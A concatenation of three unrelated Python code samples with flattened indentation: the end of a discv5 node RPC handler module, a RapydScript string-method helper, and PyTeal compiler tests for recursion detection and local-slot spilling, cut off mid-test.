for kv_pair in params:
if len(kv_pair) != 2:
raise RPCError(f"Invalid kv_pair length: {len(kv_pair)}.")
raw_key, raw_value = kv_pair
if not is_hex(raw_key):
raise RPCError(
f"Key: {raw_key} is type: {type(raw_key)}. Keys must be hex-encoded strings."
)
key = to_bytes(hexstr=raw_key)
value: Union[bytes, None]
if not raw_value:
value = None
elif is_integer(raw_value):
value = to_bytes(raw_value)
elif is_text(raw_value) and is_hex(raw_value):
value = to_bytes(hexstr=raw_value)
else:
raise RPCError(
f"Value: {raw_value} is type: {type(raw_value)}. "
"Values must be hex-str, integer, or None."
)
yield key, value
class UpdateNodeInfoHandler(RPCHandler[Tuple[ENR_KV, ...], NodeInfoResponse]):
_node_id_hex: HexStr
def __init__(self, enr_manager: ENRManagerAPI) -> None:
self._enr_manager = enr_manager
def extract_params(self, request: RPCRequest) -> Tuple[ENR_KV, ...]:
raw_params = extract_params(request)
kv_pairs = normalize_and_validate_kv_pairs(raw_params)
return kv_pairs
async def do_call(self, params: Tuple[ENR_KV, ...]) -> NodeInfoResponse:
self._enr_manager.update(*params)
return NodeInfoResponse(
node_id=encode_hex(self._enr_manager.enr.node_id),
enr=repr(self._enr_manager.enr),
)
@to_dict
def get_core_rpc_handlers(
enr_manager: ENRManagerAPI, routing_table: RoutingTableAPI
) -> Iterator[Tuple[str, RPCHandlerAPI]]:
yield ("discv5_routingTableInfo", RoutingTableInfoHandler(routing_table))
yield ("discv5_nodeInfo", NodeInfoHandler(enr_manager.enr))
yield ("discv5_updateNodeInfo", UpdateNodeInfoHandler(enr_manager))
| python |
# vim:fileencoding=utf-8
# License: BSD Copyright: 2016, Kovid Goyal <kovid at kovidgoyal.net>
# globals: ρσ_str
def strings():
string_funcs = set((
'capitalize strip lstrip rstrip islower isupper isspace lower upper swapcase'
' center count endswith startswith find rfind index rindex format join ljust rjust'
' partition rpartition replace split rsplit splitlines zfill'
).split(' '))
if not arguments.length:
exclude = {'split', 'replace'}
elif arguments[0]:
exclude = Array.prototype.slice.call(arguments)
else:
exclude = None
if exclude:
string_funcs = string_funcs.difference(set(exclude))
for name in string_funcs:
String.prototype[name] = ρσ_str.prototype[name]
| python |
from collections import OrderedDict
import pytest
from .. import *
from .subroutines import (
findRecursionPoints,
spillLocalSlotsDuringRecursion,
resolveSubroutines,
)
def test_findRecursionPoints_empty():
subroutines = dict()
expected = dict()
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_none():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: set(),
subroutine2: set(),
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_direct_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine2, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: set(),
subroutine2: {subroutine2},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_mutual_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine1, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: {subroutine2},
subroutine2: {subroutine1},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_findRecursionPoints_direct_and_mutual_recursion():
def sub1Impl():
return None
def sub2Impl(a1):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub2Impl, TealType.bytes)
subroutine3 = SubroutineDefinition(sub3Impl, TealType.none)
subroutines = {
subroutine1: {subroutine2, subroutine3},
subroutine2: {subroutine1, subroutine2, subroutine3},
subroutine3: set(),
}
expected = {
subroutine1: {subroutine2},
subroutine2: {subroutine1, subroutine2},
subroutine3: set(),
}
actual = findRecursionPoints(subroutines)
assert actual == expected
def test_spillLocalSlotsDuringRecursion_no_subroutines():
for version in (4, 5):
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps}
subroutineGraph = dict()
localSlots = {None: set()}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert mainOps == [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
def test_spillLocalSlotsDuringRecursion_1_subroutine_no_recursion():
for version in (4, 5):
subroutine = SubroutineDefinition(lambda: None, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.err),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: set()}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.err),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v4():
def sub1Impl(a1):
return None
subroutine = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: {subroutine}}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_1_subroutine_recursion_v5():
def sub1Impl(a1):
return None
subroutine = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutineL1Label = LabelReference("l1")
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
]
subroutineMapping = {None: mainOps, subroutine: subroutineOps}
subroutineGraph = {subroutine: {subroutine}}
localSlots = {None: set(), subroutine: {0}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 0),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutineL1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutineL1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_no_recursion():
for version in (4, 5):
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub1Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine2},
subroutine2: set(),
subroutine3: set(),
}
localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}}
spillLocalSlotsDuringRecursion(
version, subroutineMapping, subroutineGraph, localSlots
)
assert subroutineMapping == {
None: [
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.err),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v4():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub1Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine1},
subroutine2: {subroutine1},
subroutine3: {subroutine3},
}
localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.dig, 1),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_multiple_subroutines_recursion_v5():
def sub1Impl(a1):
return None
def sub2Impl(a1, a2):
return None
def sub3Impl(a1, a2, a3):
return None
subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine2 = SubroutineDefinition(sub1Impl, TealType.uint64)
subroutine3 = SubroutineDefinition(sub1Impl, TealType.none)
subroutine1L1Label = LabelReference("l1")
subroutine1Ops = [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
]
subroutine2L1Label = LabelReference("l1")
subroutine2Ops = [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
]
subroutine3Ops = [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
]
l1Label = LabelReference("l1")
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
]
subroutineMapping = {
None: mainOps,
subroutine1: subroutine1Ops,
subroutine2: subroutine2Ops,
subroutine3: subroutine3Ops,
}
subroutineGraph = {
subroutine1: {subroutine1},
subroutine2: {subroutine1},
subroutine3: {subroutine3},
}
localSlots = {None: set(), subroutine1: {0}, subroutine2: {1}, subroutine3: {}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.store, 255),
TealOp(None, Op.txn, "Fee"),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bz, l1Label),
TealOp(None, Op.int, 100),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.return_),
TealLabel(None, l1Label),
TealOp(None, Op.int, 101),
TealOp(None, Op.callsub, subroutine2),
TealOp(None, Op.return_),
TealOp(None, Op.callsub, subroutine3),
],
subroutine1: [
TealOp(None, Op.store, 0),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine1L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine1L1Label),
TealOp(None, Op.load, 255),
TealOp(None, Op.retsub),
],
subroutine2: [
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 1),
TealOp(None, Op.int, 0),
TealOp(None, Op.eq),
TealOp(None, Op.bnz, subroutine2L1Label),
TealOp(None, Op.load, 0),
TealOp(None, Op.int, 1),
TealOp(None, Op.minus),
TealOp(None, Op.callsub, subroutine1),
TealOp(None, Op.int, 1),
TealOp(None, Op.add),
TealOp(None, Op.retsub),
TealLabel(None, subroutine2L1Label),
TealOp(None, Op.int, 1),
TealOp(None, Op.retsub),
],
subroutine3: [
TealOp(None, Op.callsub, subroutine3),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v4():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.none)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.pop),
TealOp(None, Op.pop),
TealOp(None, Op.pop),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_no_return_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.none)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(5, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.int, 1),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.uncover, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 0),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v4():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
]
subroutineMapping = {
None: mainOps,
subroutine: subroutineOps,
}
subroutineGraph = {
subroutine: {subroutine},
}
localSlots = {None: set(), subroutine: {0, 1, 2}}
spillLocalSlotsDuringRecursion(4, subroutineMapping, subroutineGraph, localSlots)
assert subroutineMapping == {
None: [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.return_),
],
subroutine: [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.load, 0),
TealOp(None, Op.load, 1),
TealOp(None, Op.load, 2),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.dig, 5),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 2),
TealOp(None, Op.store, 1),
TealOp(None, Op.load, 0),
TealOp(None, Op.swap),
TealOp(None, Op.store, 0),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.swap),
TealOp(None, Op.pop),
TealOp(None, Op.retsub),
],
}
def test_spillLocalSlotsDuringRecursion_recursive_many_args_return_v5():
def subImpl(a1, a2, a3):
return None
subroutine = SubroutineDefinition(subImpl, TealType.uint64)
subroutineOps = [
TealOp(None, Op.store, 0),
TealOp(None, Op.store, 1),
TealOp(None, Op.store, 2),
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
TealOp(None, Op.callsub, subroutine),
TealOp(None, Op.retsub),
]
mainOps = [
TealOp(None, Op.int, 1),
TealOp(None, Op.int, 2),
TealOp(None, Op.int, 3),
